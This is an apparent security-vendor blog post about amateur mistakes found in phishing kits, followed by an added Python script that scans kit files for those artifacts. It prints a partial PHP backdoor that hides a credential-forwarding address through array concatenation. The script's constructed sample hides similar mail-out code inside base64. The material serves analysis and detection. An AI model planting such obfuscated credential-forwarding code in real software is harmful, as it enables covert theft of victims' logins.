Security Response

Phishing for Easter Eggs

Created: 14 Mar 2008 07:00:00 GMT • Updated: 23 Jan 2014 18:41:48 GMT
Candid Wueest

There are hundreds of ready-for-use phishing kits available on the Internet. At the beginning of this month, a list with more than 400 links was circulated on mailing lists and forums. Some kits are a compilation of different sophisticated scripts that can spoof many different brands at once and sometimes even bypass two-factor authentication schemes. However, the vast majority are simply archived copies of the original Web site, modified to include a small PHP script that sends the stolen credentials to an email account.

We know that not all phishers have a Ph.D. in the art of phishing; therefore, you can sometimes find some interesting and funny pieces of code in phishing kits found on the Internet. As Easter is coming up soon, I decided to compile a top five list of the funniest Easter eggs that I have seen in phishing kits lately.

In 5th place: Local image paths
Sometimes, phishers do not check whether all links have been converted correctly. The lazy approach is to just open the page locally and see if it renders correctly. Unfortunately, this test does not reveal images that render correctly only because they are loaded from a local path on the phisher's own machine. The result, once the kit is uploaded, is a phishing site with missing images and some information revealed about the attacker (in the example below, the Windows user name in the path).

Example:

...img src="file:///F:/Documents%20and%20Settings/doneminem***/Desktop/cgi-bin/formsloginb_files/fine_privati.gif...

In 4th place: “Saved from” links
Some tools, such as Internet Explorer, add the original site's location to the page when you save it. This makes it easier for you to remember where you downloaded it from. Obviously, having such "saved from" links in a phishing site is a dead giveaway that this is a scam page, and it might also reveal the attacker's private collection of scam pages.

Example:

...saved from url=(0055)http://163.XXX.YYY.ZZ/cloz/paypal/accountprocessing...

In 3rd place: Malicious code infected phishing kits
If you play with fire, you get burned. The same applies to phishing, where it gets a little, ummmm, fishy. Phishers often turn off their AV products, if they even have one installed in the first place, because they don't want the AV product to remove their newest creation. This of course means that they need to know what they are doing, as there are other threats around. So it's no surprise that we often see infected HTML scam files or phishing archives that contain unwanted malicious code. One example was a French PayPal phishing kit that was infected by a variant of the W32.Rontokbro@mm family, which tends to copy itself into different folders under the folder's name plus ".exe". Of course, you might think they did it on purpose, but having an infected phishing site does not really help you to stay under the radar.

In 2nd place: Google Analytics and banner ads
When a phisher copies an original Web site, he or she usually removes everything that does not really need to be there and that would give away its location, including images that are mirrored locally. But some attackers want to make it really realistic (or just didn't think of it) and leave all the links to banner ads in the Web page. In this way, the scammed company can even make a tiny bit of money from the displayed ads. Some phishers even leave the Google Analytics tags in the site, so that the real company can later see in its analytics reports how people arrived at this scam site and how effective it was.

And, in 1st place: Convincing backdoors
A huge percentage of those ready-to-deploy phishing kits are backdoored. This means that the script will send all logged credentials to an additional hidden email account as well. It's the story of phishers phishing phishers. Some coders try really hard to disguise their backdoors by hiding them in image files or obfuscating the code with JavaScript. The funniest backdoor version I have seen lately was a base64-encoded script which, when decoded, produced an array that was used to generate an email address for later use. I removed the name of the email account in the example below, but you can still see that the author is trying to convince the new phisher not to remove this backdoor, as "its good for your scam." Trust the word of a scammer? I don't think so.

Example code snippet:

<?php
// The array keys read "dont remove its good for your scam"; concatenating the
// values in key order yields the hidden recipient address (account name redacted).
$ar=array("dont"=>"***","remove"=>"***","its"=>"@gm","good"=>"ai","for"=>"l","your"=>".","scam"=>"com");
// Assembled at runtime so the address never appears as a plain string in the kit.
$er=$ar['dont'].$ar['remove'].$ar['its'].$ar['good'].$ar['for'].$ar['your'].$ar['scam'];
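As an added illustration (not code from the original post, from Symantec, or from any phishing kit), here is a small Python triage script of my own that scans an unpacked copy of a phishing kit for the 5th, 4th, 2nd and 1st place artifacts described above: file:// image paths, Internet Explorer "saved from" comments, leftover Google Analytics and ad tags, eval(base64_decode()) wrappers, and the array-concatenation trick used to hide a second recipient address. The sample kit files and their contents, the address xy@example.com, the host ads.example.net, the analytics ID and the 203.0.113.5 address are all constructed for this example, and the regular expressions are heuristics I chose, not a published rule set.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

Finding = Tuple[str, str, str]  # (indicator, file name, evidence)

# Heuristic indicators (my own) for the artifacts the post describes.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("local-image-path", re.compile(r"""src\s*=\s*["']?file:///""", re.I)),
    ("saved-from-url", re.compile(r"saved from url=\(\d{4}\)\S+", re.I)),
    ("google-analytics", re.compile(r"google-analytics\.com|urchinTracker\(|_uacct\s*=", re.I)),
    ("external-ad-host", re.compile(r"https?://ads?\.[\w.-]+/", re.I)),
    ("eval-base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
]
# A quoted literal handed to PHP's base64_decode(); decoded and inspected below.
BASE64_ARG = re.compile(r"""base64_decode\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
# The "$ar=array('k'=>'v', ...); $er=$ar['k'].$ar['k2']...;" assembly trick.
ARRAY_DEF = re.compile(r"\$(\w+)\s*=\s*array\(([^)]*)\)")
PAIR = re.compile(r"""["'](\w+)["']\s*=>\s*["']([^"']*)["']""")
CONCAT = re.compile(r"""\$\w+\s*=\s*((?:\$\w+\[["']\w+["']\]\s*\.?\s*)+);""")
KEY_REF = re.compile(r"""\$(\w+)\[["'](\w+)["']\]""")


def resolve_array_concat(php: str) -> Optional[str]:
    """Rebuild a string that PHP code assembles from array lookups joined with '.'.
    Returns the value when it looks like an e-mail address, otherwise None."""
    arrays: Dict[str, Dict[str, str]] = {}
    for m in ARRAY_DEF.finditer(php):
        arrays[m.group(1)] = dict(PAIR.findall(m.group(2)))
    for m in CONCAT.finditer(php):
        value = "".join(arrays.get(var, {}).get(key, "")
                        for var, key in KEY_REF.findall(m.group(1)))
        if "@" in value:
            return value
    return None


def scan_text(name: str, text: str) -> List[Finding]:
    """Report each indicator at most once per file, with the first match as evidence."""
    findings: List[Finding] = []
    for label, pattern in INDICATORS:
        m = pattern.search(text)
        if m:
            findings.append((label, name, m.group(0)))
    # Inspect the file itself plus every base64 literal it would decode at runtime.
    blobs = [text]
    for m in BASE64_ARG.finditer(text):
        try:
            blobs.append(base64.b64decode(m.group(1), validate=True).decode("latin-1"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    for blob in blobs:
        recipient = resolve_array_concat(blob)
        if recipient:
            findings.append(("hidden-recipient", name, recipient))
    return findings


def scan_kit(files: Dict[str, str]) -> List[Finding]:
    """Scan every file of an unpacked kit (file name -> contents)."""
    findings: List[Finding] = []
    for name in sorted(files):
        findings.extend(scan_text(name, files[name]))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per indicator."""
    counts: Dict[str, int] = {}
    for label, _, _ in findings:
        counts[label] = counts.get(label, 0) + 1
    return counts


# Constructed sample kit: the hidden PHP mirrors the post's array trick with a
# made-up address (xy@example.com); hosts, IP and analytics ID are placeholders.
HIDDEN_PHP = (
    '$ar=array("dont"=>"x","remove"=>"y","its"=>"@ex","good"=>"ample",'
    '"for"=>".","your"=>"co","scam"=>"m");'
    "$er=$ar['dont'].$ar['remove'].$ar['its'].$ar['good'].$ar['for'].$ar['your'].$ar['scam'];"
    'mail($er,"log",$msg);'
)
SAMPLE_KIT: Dict[str, str] = {
    "index.html": (
        "<!-- saved from url=(0032)http://203.0.113.5/kit/login.htm -->\n"
        "<html><body>\n"
        '<img src="file:///F:/Documents%20and%20Settings/user/Desktop/logo.gif">\n'
        '<img src="http://ads.example.net/banner.gif">\n'
        '<script src="http://www.google-analytics.com/urchin.js"></script>\n'
        '<script>_uacct = "UA-0000000-0"; urchinTracker();</script>\n'
        "</body></html>\n"
    ),
    "post.php": (
        "<?php\n"
        'eval(base64_decode("' + base64.b64encode(HIDDEN_PHP.encode()).decode() + '"));\n'
        'mail($to, "log", $msg);\n'
    ),
    "style.css": "body { color: #000; }\n",
}

if __name__ == "__main__":
    for label, name, evidence in scan_kit(SAMPLE_KIT):
        print(f"{label:18} {name:12} {evidence[:60]}")
```

Running the script lists one line per indicator hit; the "hidden-recipient" line shows the address that the decoded array code would assemble, which is the piece a takedown analyst most wants without executing the kit's PHP. The resolver only follows the simple array-lookup pattern the post shows; kits that build the address with string functions or nested encoding need a real PHP sandbox rather than regexes.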